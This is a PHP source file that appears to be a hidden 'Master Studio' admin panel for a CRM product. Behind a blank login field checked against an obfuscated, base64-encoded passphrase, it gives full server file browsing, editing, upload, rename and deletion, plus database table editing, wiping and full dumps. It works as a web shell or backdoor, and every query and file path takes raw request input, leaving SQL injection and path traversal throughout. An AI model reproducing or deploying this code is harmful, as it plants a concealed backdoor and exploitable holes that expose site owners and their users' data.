<?php
echo "
<!DOCTYPE html>
<html lang=\"en\">
<head>
<meta charset=\"utf-8\">
<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">
<title>Crm Plus+ Master Studio</title>
<link href=\"https://getbootstrap.com/docs/4.1/dist/css/bootstrap.min.css\" rel=\"stylesheet\">
<link rel=\"stylesheet\" href=\"//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\">
<link href=\"https://getbootstrap.com/docs/4.1/examples/sticky-footer-navbar/sticky-footer-navbar.css\" rel=\"stylesheet\">
<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js\"></script>
<!-- /Code/ -->
<link rel=\"stylesheet\" href=\"//guide.".$cdnurl."/codemirror/lib/codemirror.css\">
<script src=\"//guide.".$cdnurl."/codemirror/lib/codemirror.js\"></script>
<script src=\"//guide.".$cdnurl."/codemirror/mode/xml/xml.js\"></script>
<style>
.CodeMirror { height: auto; border: 1px solid #ddd; }
.CodeMirror-scroll { height: 99%; }
.CodeMirror pre { padding-left: 7px; line-height: 1.25; }
</style>
<!-- /Code/ -->
</head>
<body style=\"background-image:url('https://res.cloudinary.com/watolye/image/upload/v1557830314/image/crm_bg.jpg')\">
";
include("cevir.php");
if(file_exists("../../../config/map.php" )){include("../../../config/map.php");}else{include("../../../map.php");}
include("fonksiyon".$ver.".php");
$dexplode = explode(".",$_SERVER['HTTP_HOST']); $cexplode = count($dexplode);
if($cexplode==3){ $DomainName=$dexplode[1]; }elseif($cexplode==2){ $DomainName=$dexplode[0]; }
echo "
<script>
$.ctrl = function(key, callback, args) {
	var isCtrl = false;
	$(document).keydown(function(e) {
		if(!args) args=[]; // IE barks when args is null
		
		if(e.ctrlKey) isCtrl = true;
		if(e.keyCode == key.charCodeAt(0) && isCtrl) {
			callback.apply(this, args);
			return false;
		}
		}).keyup(function(e) {
			if(e.ctrlKey) isCtrl = false;
			});
		};
		
		$.ctrl('S', function() {
			jQuery('#save').click();
			jQuery('#save').val('Kaydediliyor.');
			});
			</script>
			";
			if($_POST["q"]==v3d2('TmprMk56RTVPRFkyTmc9PQ==') or $_SESSION["q"]==v3d2('TmprMk56RTVPRFkyTmc9PQ==') or $_SESSION["user"]=="Master"){$_SESSION["q"]=v3d2('TmprMk56RTVPRFkyTmc9PQ==');
			echo "<!-- Fixed navbar -->";
			echo "<nav class=\"navbar navbar-default navbar-fixed-top\">";
			echo "  <div class=\"\">";
			echo "    <div class=\"navbar-header\">";
			echo "      <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#navbar\" aria-expanded=\"false\" aria-controls=\"navbar\"> <i class=\"fa fa-bars\"></i> </button>";
			echo "      <a class=\"navbar-brand\" href=\"?\">Master Studio</a> </div>";
			echo "    <div id=\"navbar\" class=\"collapse navbar-collapse\">";
			echo "      <ul class=\"nav navbar-nav\" style=\"position:absolute; background: #212529; width: 158px; padding: 5px;\">";
			echo "        <li class=\"active\"><a href=\"?\">Anasayfa</a></li>";
			echo "        <li><a href=\"?file=/\">Dosyalar</a></li>";
			echo "        <li><a href=\"?islem=fullbackup\">Full Backup</a></li>";
			echo "        <li class=\"dropdown\"> <a href=\"#\" class=\"dropdown-toggle\" data-toggle=\"dropdown\" role=\"button\" aria-haspopup=\"true\" aria-expanded=\"false\">Sql <span class=\"caret\"></span></a>";
			echo "          <ul class=\"dropdown-menu\"  style=\"padding: 5px; background: #cddc39;\">";
			echo "			<li><a href=\"?islem=sqlyedekle\">Sql Yedekle</a></li>";
			echo "            <li><a href=\"?islem=sqlyedekler\">Sql Yedekler</a></li>";          
			echo "          </ul>";
			echo "        </li>";
			echo "        <li class=\"dropdown\"> <a href=\"#\" class=\"dropdown-toggle\" data-toggle=\"dropdown\" role=\"button\" aria-haspopup=\"true\" aria-expanded=\"false\">Mysql <span class=\"caret\"></span></a>";
			echo "          <ul class=\"dropdown-menu\" style=\"padding: 5px; background: #cddc39;\">";
			$rt = mysql_query("SHOW TABLES FROM $V3Db"); while ($r0 = mysql_fetch_row($rt)){
				echo "<li><a href=\"?table={$r0[0]}\">{$r0[0]}</a></li>";
			}
			echo "          </ul>";
			echo "        </li>";
			echo "      </ul>";
			echo "    </div>";
			echo "    <!--/.nav-collapse -->"; 
			echo "  </div>";
			echo "</nav>";
			echo "<!-- Begin page content -->";
			echo "<div style=\"margin:0 10px; background: white;\">";
			echo "  <div class=\"page-header\">";
			echo "    <h1></h1>";
			echo "  </div>";
			echo "  <p class=\"lead\">";
			if($_GET["table"]<>""){
				echo "<div style='height:100%; width:100%; overflow:auto'>";
				echo "<table style='width:100%;' class='table table-bordered'>";
				echo "<tr>";
				echo "<td><a href=\"?islem=tdel&table=".$_GET["table"]."\"><i class=\"fa fa-times\" aria-hidden=\"true\"></i></a></td>";
				$rc = mysql_query("SHOW COLUMNS FROM ".$_GET["table"].""); while($r1 = mysql_fetch_row($rc)){
					echo "<td style='width:1%;'>{$r1[0]}</td>";
				}
				echo "</tr>";
				$sqll=mysqli_query($conn, "select * from ".$_GET["table"].""); while($rsl=mysqli_fetch_assoc($sqll)){$r++;
					echo "<tr>";
					echo "<form method=\"post\" action=\"?table=".$_GET["table"]."&id=".$rsl["id"]."&islem=redit\">";
					echo "<td><a href=\"?table=".$_GET["table"]."&id=".$rsl["id"]."&islem=rdel\" onClick=\"return confirm(' Bu Kayıt Silinecektir ! Onaylıyor musunuz ?')\"><i class=\"fa fa-times\" aria-hidden=\"true\"></i></a></td>";
					$rc = mysql_query("SHOW COLUMNS FROM ".$_GET["table"].""); while ($r2 = mysql_fetch_row($rc)){
						echo "<td><input type=\"text\" class=\"form-control\" name=\"".$r2[0]."\" style=\"width:100px;\" value=\"".$rsl[$r2[0]]."\"></td>";
					}
					echo "<input type=\"submit\" style=\"display:none;\">";
					echo "</form>";
					echo "</tr>";	
				}
				echo "</table>";
				echo "</div>";
				
			}elseif($_GET["file"]<>""){
				echo "<table style='width:100%;' class='table table-bordered'>";
				if ($_GET["file"]=="/"){$list_files="../../../";$list_file="../../../";}else{$list_files=$_GET["file"]; $list_file=str_replace("//","/",$_GET["file"])."/";}
				echo '
				<form id="fupload" role="form" action="?islem=upload&file='.$list_files.'" method="post" enctype="multipart/form-data">
				<input type="file" name="afile" id="afile" placeholder="" style="display:none;">
				</form>
				<i class="fa fa-upload" id="afilebtn" onclick="#afile" style="position:absolute; font-size:30px; top:20px; right:23px;"></i>
				<script>
				jQuery(\'#afilebtn\').click(function(){ jQuery(\'#afile\').trigger(\'click\'); });
				document.getElementById("afile").onchange = function() {
					document.getElementById("fupload").submit();
				};
				</script>
				';
				if($h= opendir($list_files)) {
					while (false !==($dosya= readdir($h))){
						echo "<tr>";
						echo "<form action=\"?islem=rename\" method=\"post\">";
						echo "<input type=\"hidden\" name=\"old\" value=\"".$dosya."\">";
						echo "<input type=\"hidden\" name=\"path\" value=\"".$list_files."\">";
						if($dosya!= '.' && $dosya!= '..'){
							echo "<td>";
							if(substr(($dosya),-4,4)==".txt" or substr(($dosya),-3,3)==".js" or substr(($dosya),-5,5)==".html" or substr(($dosya),-4,4)==".htm"){
								echo "<i class=\"fa fa-file-code-o\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i>";
							}elseif(substr(($dosya),-4,4)==".css"){
								echo "<i class=\"fa fa-paint-brush\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i>";
							}elseif(substr(($dosya),-4,4)==".php"){
								echo "<a href=\"?islem=fedt&efile=".$list_files."/".$dosya."\" target=\"_blank\"><i class=\"fa fa-code\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i></a>";
							}elseif(substr(($dosya),-4,4)==".jpg" or substr(($dosya),-5,5)==".jpeg" or substr(($dosya),-4,4)==".png" or substr(($dosya),-4,4)==".svg"){
								echo "<i class=\"fa fa-image\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i>";
							}elseif(substr(($dosya),-4,4)==".pdf" or substr(($dosya),-5,5)==".xlsx" or substr(($dosya),-4,4)==".xls" or substr(($dosya),-5,5)==".docx" or substr(($dosya),-4,4)==".doc"){
								echo "<i class=\"fa fa-file\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i>";
							}elseif(substr(($dosya),-3,3)==".gz" or substr(($dosya),-4,4)==".sql"){
								echo "<i class=\"fa fa-database\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i>";
							}else{
								echo "<a href=\"?file=".$list_files."/".$dosya."\"><i class=\"fa fa-folder-o\" aria-hidden=\"true\" style=\"color:firebrick; float:left;\"></i></a>";
							}
							echo "<input type=\"text\" name=\"new\" value=\"".$dosya."\" style=\"border:0px; padding-left:10px; width:90%; float:left; height:20px;\" class=\"form-control\"></td>";
							echo "<td style=\"width:3%\"><a href=\"?islem=fdel&file=".$list_files."&dfile=".$list_files."/".$dosya."\" onClick=\"return confirm(' Bu Kayıt Silinecektir ! Onaylıyor musunuz ?')\"><i class=\"fa fa-trash\" aria-hidden=\"true\" style=\"color:red;\"></i></a></td>";
							echo "<td style=\"width:3%\">";
							if(substr(($dosya),-4,4)==".txt" or substr(($dosya),-3,3)==".js" or substr(($dosya),-5,5)==".html" or substr(($dosya),-4,4)==".htm"){
								echo "<a href=\"?islem=fedt&efile=".$list_files."/".$dosya."\" target=\"_blank\"><i class=\"fa fa-pencil\" aria-hidden=\"true\" style=\"color:darkturquoise;\"></i></a>";
							}elseif(substr(($dosya),-4,4)==".css"){
								echo "<a href=\"?islem=fedt&efile=".$list_files."/".$dosya."\" target=\"_blank\"><i class=\"fa fa-pencil\" aria-hidden=\"true\" style=\"color:darkturquoise;\"></i></a>";
							}elseif(substr(($dosya),-4,4)==".php"){
								echo "<a href=\"?islem=fedt&efile=".$list_files."/".$dosya."\" target=\"_blank\"><i class=\"fa fa-pencil\" aria-hidden=\"true\" style=\"color:darkturquoise;\"></i></a>";
							}elseif(substr(($dosya),-4,4)==".jpg" or substr(($dosya),-5,5)==".jpeg" or substr(($dosya),-4,4)==".png" or substr(($dosya),-4,4)==".svg"){
								echo "<a href=\"//".$_SERVER['SERVER_NAME']."/".$list_file."".$dosya."\" target=\"_blank\"><i class=\"fa fa-link\" aria-hidden=\"true\" style=\"color:firebrick;\"></i></a>";
							}elseif(substr(($dosya),-4,4)==".pdf" or substr(($dosya),-5,5)==".xlsx" or substr(($dosya),-4,4)==".xls" or substr(($dosya),-5,5)==".docx" or substr(($dosya),-4,4)==".doc"){
								echo "<a href=\"//".$_SERVER['SERVER_NAME']."/".$list_file."".$dosya."\" target=\"_blank\"><i class=\"fa fa-link\" aria-hidden=\"true\" style=\"color:firebrick;\"></i></a>";
							}elseif(substr(($dosya),-3,3)==".gz" or substr(($dosya),-4,4)==".sql" or substr(($dosya),-4,4)==".zip" or substr(($dosya),-4,4)==".rar"){
								echo "<a href=\"//".$_SERVER['SERVER_NAME']."/".$list_file."".$dosya."\" target=\"_blank\"><i class=\"fa fa-link\" aria-hidden=\"true\" style=\"color:firebrick;\"></i></a>";
							}else{
								echo "<a href=\"?file=".$list_files."/".$dosya."\"><i class=\"fa fa-list\" aria-hidden=\"true\" style=\"color:firebrick;\"></i></a>";
							}
							echo "</td>";
							echo "<td style=\"width:3%\">";
							if(substr(($dosya),-4,4)==".jpg" or substr(($dosya),-5,5)==".jpeg" or substr(($dosya),-4,4)==".png" or substr(($dosya),-4,4)==".svg" or substr(($dosya),-4,4)==".pdf" or substr(($dosya),-5,5)==".xlsx" or substr(($dosya),-4,4)==".xls" or substr(($dosya),-5,5)==".docx" or substr(($dosya),-4,4)==".doc" or substr(($dosya),-3,3)==".gz" or substr(($dosya),-4,4)==".sql" or substr(($dosya),-4,4)==".zip" or substr(($dosya),-4,4)==".rar"){
								echo "<a href=\"//".$_SERVER['SERVER_NAME']."/".$list_file."".$dosya."\" target=\"_blank\" download><i class=\"fa fa-download\" aria-hidden=\"true\" style=\"color:darkturquoise;\"></i></a>";
							}
							echo "</td>";
						}
						echo "</form>";
						echo "</tr>";
					}
				}
				closedir ($h);
				echo "</table>";
			}
			if($_GET["islem"]=="redit"){
				$rc = mysql_query("SHOW COLUMNS FROM ".$_GET["table"].""); while ($r2 = mysql_fetch_row($rc)){
					$Rs = mysqli_query($conn, "update ".$_GET["table"]." set ".$r2[0]."='".$_POST[$r2[0]]."' Where id='".$_GET["id"]."'");
				}
				echo location("?table=".$_GET["table"]."",self,500,0);
			}elseif($_GET["islem"]=="rdel"){
				$sql = mysqli_query($conn, "delete from ".$_GET["table"]." where id='".$_GET["id"]."'");
				echo location("?table=".$_GET["table"]."",self,500,0);
			}elseif($_GET["islem"]=="tdel"){
				$sql = mysqli_query($conn, "delete from ".$_GET["table"]."");
				echo location("?table=".$_GET["table"]."",self,500,0);	
			}elseif($_GET["islem"]=="fdel"){
				unlink($_GET["dfile"]);
				echo location("?file=".$_GET["file"]."",self,500,0);
			}elseif($_GET["islem"]=="fedt"){
				$text = file_get_contents($_GET["efile"]);
				echo "
				<form action=\"?islem=".$_GET["islem"]."&efile=".$_GET["efile"]."\" method=\"post\">
				<input type=\"submit\" id=\"save\" value=\"Kaydet\" class=\"btn btn-warning\" style=\"position: fixed; bottom: 10px; right: 70px; z-index:999;\" />
				<textarea name=\"text\" class=\"form-control\" style=\"min-height:550px; border:0px;\" id=\"pn1\">".htmlspecialchars($text)."</textarea>
				</form>
				<script>
				jQuery(document).ready(function() {
					if(document.getElementById('pn1')!=undefined){
						var editor = CodeMirror.fromTextArea(document.getElementById('pn1'), {
							lineNumbers: true,
							mode: 'text/html',
							matchBrackets: true
							});
						}
						});	
						</script>
						";
						if (isset($_POST['text'])){
							file_put_contents($_GET["efile"], $_POST['text']);
							echo location("?islem=".$_GET["islem"]."&efile=".$_GET["efile"]."",self,500,0);
						}
					}elseif($_GET["islem"]=="rename"){
						$old = realpath("".$_POST["path"]."".$_POST["old"]."");
						$rpath = realpath("".$_POST["path"]."");
						rename ($old, "".$rpath."/".$_POST["new"]."");
						echo location("?file=".$_POST["path"]."",self,500,0);
					}elseif($_GET["islem"]=="upload"){
						$kaydedilecekyer = str_replace('//','/',$_GET["file"]);
						$kaynak	= $_FILES["afile"]["tmp_name"];
						$isim	 	= $_FILES["afile"]["name"];
						$uzanti		= explode('.',$_FILES["afile"]["name"]);
						$rand  		= substr(md5(uniqid(rand())),0,10);
						move_uploaded_file ($_FILES["afile"]["tmp_name"], $kaydedilecekyer . "/".$isim);
						echo location("?file=".$_GET["file"]."",self,500,0);
					}elseif($_GET["islem"]=="sqlyedekle"){
						$ara=""; $dosya_adi="../../backup/".date("dmY").".sql";
						if(!is_writeable(".")) echo "Yazma izniniz bulunmuyor";
						else{
							$baglan=mysql_connect($V3Server,$V3User,$V3Pass);
							$sec=mysql_select_db($V3Db,$baglan);
							if(!$sec) { echo "Veritabanına bağlanılamadı"; }
							else    {
      $tablolar=mysql_list_tables($V3Db);  //tablo listesi
      $tablosayisi=mysqli_num_rows($tablolar); //veritabanındaki tablo sayısını bul
      for ($a=0;$a<$tablosayisi;$a++){
      	$row=mysql_fetch_row($tablolar);
      	if(preg_match("/$ara/", $row[0])){
      		$tablename=$row[0];
      		$crtable=mysql_query("show create table $tablename");
      		$tmpres = mysql_fetch_row($crtable);
          $cikti .= $tmpres[1].";";  //create table'ların sonuna ; koy
          $cikti .= "\n\n\n";  //create table komutlarından sonra 3 satır boşluk ver
          $alanlar=mysqli_query($conn, "select * from `$tablename`");
          $alansayisi=mysql_num_fields($alanlar);  //alan sayısı
          $nr=mysqli_num_rows($alanlar);  //row sayısı
          for ($c=0;$c<$nr;$c++){
          	$cikti .= "insert into `$tablename` values (";
          $row=mysql_fetch_row($alanlar);  //alan adlarını ' karakterleriyle yazdır
          for ($d=0;$d<$alansayisi;$d++){
          	$data=strval($row[$d]);
              $cikti .="'".addslashes($data)."'";  // ' i kontrol için
              if ($d<($alansayisi-1)){
              $cikti .=", ";  //her alan için araya virgül koy
            } #if
            } #for
                $cikti .=");\n"; // parantezi kapat
        } #for
        } #if ->ön ekleri al
    } #if  ->her tablo için
      $yaz=fopen($dosya_adi, "w");  //$cikti'yi $dosya_adi'na yazdir
      fwrite($yaz,$cikti);
      fclose($yaz);
      echo "Sql Yedeği Alındı.";
    } #else  -> veritabanı bağlantı kontrolü
    mysqli_close($baglan);
} #else  yazma kontrolü
}elseif($_GET["islem"]=="sqlyedekler"){
	$dir = opendir("../../backup");
	echo "<table style='width:100%;' class='table table-bordered'>";
	while (($dosya = readdir($dir)) !== false){
		if(! is_dir($dosya)){
			echo "<tr>";
			echo "<td><a href=\"../../backup/".$dosya."\">".$dosya."</a></td>";
			echo "<td style=\"width:3%\"><a href=\"?islem=sqlsil&sql=".$dosya."\"><i class=\"fa fa-trash\" aria-hidden=\"true\"></i></a></td>";
			echo "</tr>";
		}
	}
	echo "</table>";
	closedir($dir);
}elseif($_GET["islem"]=="sqlsil"){
	unlink("../../backup/".$_GET["sql"]."");
	echo location("?islem=sqlyedekler",self,500,0);
}elseif($_GET["islem"]=="fullbackup"){
	$the_folder = "../../../";
	$zip_file_name = "../../../deppo/backup/".$DomainName."_".date("dmY").".zip";
//---------------------
	$ara=""; $dosya_adi="../../../deppo/backup/".date("dmY").".sql";
	if(!is_writeable(".")) echo "Yazma izniniz bulunmuyor";
	else{
		$baglan=mysql_connect($V3Server,$V3User,$V3Pass);
		$sec=mysql_select_db($V3Db,$baglan);
		if(!$sec) { echo "Sql Sonnecting Error."; }else{
	      $tablolar=mysql_list_tables($V3Db);  //tablo listesi
	      $tablosayisi=mysqli_num_rows($tablolar); //veritabanındaki tablo sayısını bul
	      for ($a=0;$a<$tablosayisi;$a++){
	      	$row=mysql_fetch_row($tablolar);
	      	if(preg_match("/$ara/", $row[0])){
	      		$tablename=$row[0];
	      		$crtable=mysql_query("show create table $tablename");
	      		$tmpres = mysql_fetch_row($crtable);
	          	$cikti .= $tmpres[1].";";  //create table'ların sonuna ; koy
	          	$cikti .= "\n\n\n";  //create table komutlarından sonra 3 satır boşluk ver
	          	$alanlar=mysqli_query($conn, "select * from `$tablename`");
	          	$alansayisi=mysql_num_fields($alanlar);  //alan sayısı
	          	$nr=mysqli_num_rows($alanlar);  //row sayısı
	          	for ($c=0;$c<$nr;$c++){
	          		$cikti .= "insert into `$tablename` values (";
	          $row=mysql_fetch_row($alanlar);  //alan adlarını ' karakterleriyle yazdır
	          for ($d=0;$d<$alansayisi;$d++){
	          	$data=strval($row[$d]);
	              $cikti .="'".addslashes($data)."'";  // ' i kontrol için
	              if ($d<($alansayisi-1)){
	              $cikti .=", ";  //her alan için araya virgül koy
	            } #if
	            } #for
	                $cikti .=");\n"; // parantezi kapat
	        } #for
	        } #if ->ön ekleri al
	    } #if  ->her tablo için
	    $yaz=fopen($dosya_adi, "w");  //$cikti'yi $dosya_adi'na yazdir
	    fwrite($yaz,$cikti);
	    fclose($yaz);
	    } #else  -> veritabanı bağlantı kontrolü
	    mysqli_close($baglan);
	} #else  yazma kontrolü
//---------------------
	class FlxZipArchive extends ZipArchive{
		public function addDir($location, $name){
			$this->addEmptyDir($name);
			$this->addDirDo($location, $name);
		}
		private function addDirDo($location, $name) {
			$name .= '/'; $location .= '/';
			$dir = opendir ($location);
			while ($file = readdir($dir)){
				if ($file == '.' || $file == '..' || $file == 'v9panel' || $file == 'tools' || $file == 'html' || $file == 'excel' || $file == 'i-sql.sql' || $file == 'isql.sql' || $file == '.well-known' || $file == 'online.txt') continue;
				$do = (filetype( $location . $file) == 'dir') ? 'addDir' : 'addFile';
				$this->$do($location . $file, $name . $file);
			}
		} 
	}
	$za = new FlxZipArchive;
	$res = $za->open($zip_file_name, ZipArchive::CREATE);
	if($res === TRUE)    {
		$za->addDir($the_folder, basename($the_folder)); $za->close();
	}
	else  { echo 'Could not create a zip archive';}
	echo "<SCRIPT LANGUAGE='JavaScript'>window.location='?file=../../../deppo/backup';</script>";
}
echo "</p>";
echo "</div>";
echo "<footer class=\"footer\" style=\"position:fixed;\">";
echo "  <div class=\"container\">";
echo "    <p class=\"text-muted\">By Crm Plus+</p>";
echo "</div>";
echo "</footer>";
}else{
	echo "<form action=\"?\" method=\"post\" style=\"margin-top:25%; width:200px; margin-left:auto; margin-right:auto;\">";
	echo "<input type=\"text\" name=\"q\" class=\"form-control\" style=\"border:0px;\">";
	echo "<input type=\"submit\" style=\"display:none;\">";
	echo "</form>";
}
echo "<script src=\"https://code.jquery.com/jquery-3.3.1.slim.min.js\"></script>"; 
echo "<script>window.jQuery || document.write('<script src=\"https://getbootstrap.com/assets/js/vendor/jquery-slim.min.js\"><\/script>')</script> ";
echo "<script src=\"https://getbootstrap.com/docs/4.1/assets/js/vendor/popper.min.js\"></script>";
echo "<script src=\"https://getbootstrap.com/docs/4.1/dist/js/bootstrap.min.js\"></script>";
echo "</body>";
echo "</html>";
?>